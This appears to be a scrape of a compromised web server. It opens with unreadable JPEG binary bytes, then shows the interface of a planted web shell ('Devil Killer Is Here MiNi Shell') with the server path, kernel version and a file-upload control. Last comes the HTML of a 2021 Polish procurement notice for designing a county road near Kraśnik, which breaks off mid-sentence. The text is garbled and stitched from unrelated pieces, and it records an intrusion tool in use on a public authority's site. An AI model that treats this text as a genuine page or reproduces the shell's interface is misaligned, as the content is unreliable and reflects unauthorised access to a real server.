JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008362101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00083621 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji dla zadania inwestycyjnego pn.: „Budowa drogi powiatowej relacji Urzędów – Kraśnik – Wyżnianka – Olbięcin” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kraśniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029369</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraśnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 818264126</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 818251027</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-krasnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-krasnik.powiatkrasnicki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji dla zadania inwestycyjnego pn.: „Budowa drogi powiatowej relacji Urzędów – Kraśnik – Wyżnianka – Olbięcin” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2f232277-cdad-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00083621</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005119/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dokumentacja projektowa: Budowa drogi powiatowej relacji Urzędów-Kraśnik-Wyżnianka-Olbięcin </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdp-powiatkrasnicki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie za pośrednictwem<br/>Platformy znajdującej się pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl w zakładce<br/>„Korespondencja”. 2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do<br/>Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do<br/>Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. 3. Ogólne zasady korzystania z<br/>Platformy, z zastrzeżeniem pkt 8 niniejszego rozdziału: 3.1. Zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Systemu na subdomenie https://zdp-powiatkrasnicki.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl .3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło,<br/>wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3.3. Rejestracja<br/>Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować siępod numerem telefonu podanym w ww. potwierdzeniu. 3.4. Po założeniu konta Wykonawca ma<br/>możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się<br/>datę ich wysłania za pośrednictwem zakładki „Korespondencja”. 4. Wykonawca może zwrócić się<br/>do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. 5. Treść pytań (bez<br/>ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ,<br/>Zamawiający zamieści za pośrednictwem Platformy Zakupowej. 6. Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa, tel. +48 22<br/>576 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl. 7. Zamawiający określa dopuszczalny format podpisu<br/>elektronicznego, jako: 7.1. Dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES. 7.2.<br/>Dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny<br/>plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego<br/>dokumentu, oddzielny plik z podpisem. 8. Zamawiający określa niezbędne wymagania sprzętowoaplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej tj.: 8.1. Stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 8.2. Komputer klasy PC lub MAC,<br/>o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; 8.3. Zainstalowana<br/>dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku<br/>Internet Explorer minimalnie wersja 10.0; 8.4. Włączona obsługa JavaScript; 8.5. Zainstalowany<br/>program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1)administratorem Pani/Pana danych osobowych<br/>jest:Zarządu Dróg Powiatowych w Kraśniku,reprezentowany przez Dyrektora Zarządu Dróg<br/>Powiatowych, ul.Szpitalna 2A, 23-204 Kraśnik tel.(+48) 81 8264126, fax: (+48) 81 8251027, e-mail:<br/>sekretariat@zdpkrasnik.pl; 2) kontakt z Inspektorem Ochrony Danych: adres e-mail:<br/>abi@powiatkrasnicki.pl;Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Opracowanie dokumentacji dla zadania inwestycyjnego pn.:<br/>„Budowa drogi powiatowej relacji Urzędów – Kraśnik – Wyżnianka – Olbięcin”<br/> (oznaczenie sprawy: ZDP/4/TP/2021) prowadzonym w trybie podstawowym; 3)<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11września 2019 r. – Prawo<br/>zamówień publicznych (tekst jedn. Dz. U. z 2019 r. poz. 2019 z późn. zm.),dalej „ustawa Pzp”;<br/>4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 5)obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 7) posiada Pani/Pan:a)na podstawie art. 15RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących;b)na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych *;c)na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO **; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO; 8) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO 9)<br/>odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Zarządu DrógPowiatowych w<br/>Kraśniku oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672)przy ul.<br/>Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru<br/>Sądowego,prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział<br/>Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436,<br/>NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Zarządu Dróg Powiatowych w<br/>Kraśniku prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem:<br/>https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/4/TP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Podstawowym celem zamówienia jest:<br/>a) Opracowanie wielobranżowej kompleksowej dokumentacji projektowej w stadium Projektów Budowlanych i Wykonawczych wraz z dokumentacją geodezyjno-prawną, decyzjami oraz ze wszystkimi uzgodnieniami i opiniami, dla przedsięwzięcia pn.: „Budowa drogi powiatowej relacji Urzędów – Kraśnik – Wyżnianka – Olbięcin” wraz z budową i rozbudową obiektów inżynierskich oraz zabezpieczeniem lub rozbudową urządzeń obcych kolidujących z rozbudowywaną drogą i obiektami inżynierskimi, umożliwiającej złożenie wniosku i uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej (decyzja ZRID) w trybie Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (j.t. Dz.U. z 2020 r. poz. 1363 z póżn. zm.) wraz z uzyskaniem wymaganych opinii do wniosku i przygotowaniem wniosku oraz z materiałami do wniosku o uzyskanie tej decyzji.<br/>b) Opracowanie materiałów i uzyskanie załączników, niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach wraz z jej uzyskaniem przez Wykonawcę.<br/>c) Opracowanie materiałów i uzyskanie załączników, niezbędnych do uzyskania stosownej zgody wodno-prawnej/pozwolenia wodnoprawnego wraz z jej uzyskaniem przez Wykonawcę.<br/>d) Opracowanie materiałów niezbędnych do ogłoszenia przetargu na wykonanie robót budowlanych wymaganych przez Prawo Zamówień Publicznych i późniejszą realizację zadania.<br/>2. Wykonawca zapewni Nadzór Autorski w czasie robót realizowanych na podstawie dokumentacji projektowej oraz w zakresie określonym przez ustawę Prawo budowlane (art. 20 ust.1 pkt 4 ustawy) oraz zgodnie z ustaleniami określonymi we wzorze Umowy. Pełnienie Nadzoru Autorskiego odbędzie się na zasadach prawa opcji w rozumieniu art. 441 ust. 1 ustawy Prawo zamówień publicznych. Zlecenie wykonywania Nadzoru Autorskiego zależeć będzie od potrzeb Zamawiającego w momencie zaistnienia sytuacji określonych w Prawie budowlanym. Wykonawca zobowiązany jest do sprawowania Nadzoru Autorskiego w trakcie realizacji robót objętych dokumentacją projektową, planowany termin zakończenia realizacji inwestycji do dnia 31 grudnia 2030 r. z możliwością przedłużenia tego terminu w przypadku przedłużenia czasu trwania budowy i zmiany terminu ostatecznego odbioru robót.<br/>3. Zamawiający w OPZ określił, że przedmiot zamówienia, tj. projekt ma obejmować m.in. ,,Zniesienie barier architektonicznych w obrębie budowanego odcinka drogi dla zapewnienia dostępności dla wszystkich użytkowników, w szczególności dla osób niepełnosprawnych" (punkt 2.1.1 OPZ), a tym samym jako obiekt publiczny po zrealizowaniu budowy, nie będzie posiadał ograniczeń dostępności przez wszystkich uczestników ruchu drogowego, w tym przez osoby niepełnosprawne, do czego obligują przepisy dotyczące wymagań m.in. dla warunków technicznych, jakim powinny odpowiadać drogi publiczne (j.t. Dz.U. z 2016 r. poz. 124 z późn. zm.), drogowe obiekty inżynierskie (Dz.U. z 2000 r. Nr 63 poz. 735 z późn. zm.) i budynki (j.t. Dz.U. z 2019 r. poz. 1065 z późn. zm.).<br/> <br/>Szczegółowy zakres przedmiotu zamówienia ujęty jest w Opisie przedmiotu zamówienia stanowiącym Załącznik nr 1 do Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">70000000-1 - Usługi w zakresie nieruchomości</p> <p class="mb-0">71322300-4 - Usługi projektowania mostów</p> <p class="mb-0">90720000-0 - Ochrona środowiska</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wykonawca zapewni Nadzór Autorski w czasie robót realizowanych na podstawie przedmiotowej dokumentacji projektowej oraz w zakresie określonym przez ustawę Prawo budowlane (art. 20 ust.1 pkt 4 ustawy [1]) oraz zgodnie z ustaleniami określonymi we wzorze Umowy. Pełnienie Nadzoru Autorskiego odbędzie się na zasadach prawa opcji w rozumieniu art. 441 ust. 1 ustawy Prawo zamówień publicznych. Zlecenie wykonywania Nadzoru Autorskiego zależeć będzie od potrzeb Zamawiającego.<br/>Wykonawca zobowiązany jest do sprawowania Nadzoru Autorskiego w trakcie realizacji robót objętych dokumentacją projektową, przewidywany termin zakończenia realizacji inwestycji – 31 grudnia 2030 r.<br/>A.	Nadzór Autorski obejmuje:<br/>a)	nadzór autorski zamiejscowy na budowie (w ilości maksymalnej 30 nadzorów): przygotowanie materiału do pełnienia nadzoru, czas przejazdu z biura projektowania na budowę i z powrotem, czas pobytu na budowie w jednym dniu,	załatwienie spraw związanych z nadzorem po powrocie.<br/>b)	nadzór autorski miejscowy w biurze (w ilości maksymalnej 50 nadzorów):<br/>proste czynności wykonywane w siedzibie Jednostki Projektowej, jeżeli wynika to z potrzeb realizacji inwestycji, np. wydanie opinii, wykonywanie analizy lub opracowanie pisma nie wymagającego obecności na budowie itp.<br/>B.	Nadzór Autorski będzie sprawowany na zlecenia Zamawiającego. Zlecenia wykonywania Nadzoru Autorskiego zależeć będą od potrzeb Zamawiającego. Oznacza to, że Zamawiający może zrezygnować z całości lub z części określonej w SWZ przez Zamawiającego maksymalnej ilości nadzoru autorskiego (prawo opcji).<br/>C.	Rozliczenie następować będzie na podstawie zleconych i wykonanych pobytów zespołu na budowie lub w przypadku Nadzoru Autorskiego miejscowego po otrzymaniu przez Zamawiającego przedmiotu nadzoru. tj. opinii, analizy, innych pism niewymagających obecności na budowie.<br/>D.	Zamawiający powiadomi pisemnie Wykonawcę o planowanym rozpoczęciu realizacji prac objętych dokumentacją projektową co najmniej 2 tygodnie przed planowanym terminem rozpoczęcia prac. Zlecenie wykonania Nadzoru Autorskiego nastąpi co najmniej na 3 dni robocze przed określonym przez Zamawiającego terminem wykonania nadzoru. Zlecenie wykonania Nadzoru następować będzie pisemnie.<br/>Pisemne zlecenie zostanie jednocześnie przekazane mailowo na adres wskazany przez Wykonawcę. Równocześnie Zamawiający poinformuje Wykonawcę o zleceniu telefonicznie. W sytuacjach szczególnych (np. katastrofa budowlana), wymagających niezwłocznej obecności autora projektu na terenie prowadzenia robót, osoba pełniąca nadzór autorski zobowiązana jest wykonać nadzór autorski w dniu powiadomienia. W takim wypadku zlecenie wykonania Nadzoru Autorskiego może nastąpić telefonicznie z późniejszym pisemnym potwierdzeniem dokonania zlecenia. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis sposobu oceny ofert zawarty jest w pkt. XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wykonanie otworów badawczych w badaniach geotechnicznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności 